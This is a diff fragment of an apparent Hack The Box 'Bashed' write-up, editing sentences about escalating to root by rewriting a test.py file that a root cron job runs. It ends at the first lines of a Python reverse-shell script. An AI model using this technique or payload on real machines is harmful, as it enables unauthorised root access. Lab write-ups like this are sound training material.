rax-register/rax-register.github.io/_posts/2020-07-09-htb-bashed.md

 ![](/images/bashed/20. enum_4.png "enum")

-test.txt has a new timestamp...14:07, meaning there is a cron job or some scheduled task that is running test.py every minute or so. since user scriptmanager owns test.py, we can modify test.py and maybe gain a root shell!
+test.txt has a new timestamp of 14:07, meaning there is a cron job or some scheduled task that is running test.py every minute or so.
+Since user scriptmanager owns test.py, we can modify test.py and when the cron job runs as root we can gain a root shell!

-On my Kali machine I created a new test.py file and put this code in it:
+On my Kali machine I created a new python file and put this code in it:

+test.py:

     import socket,subprocess,os
     s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)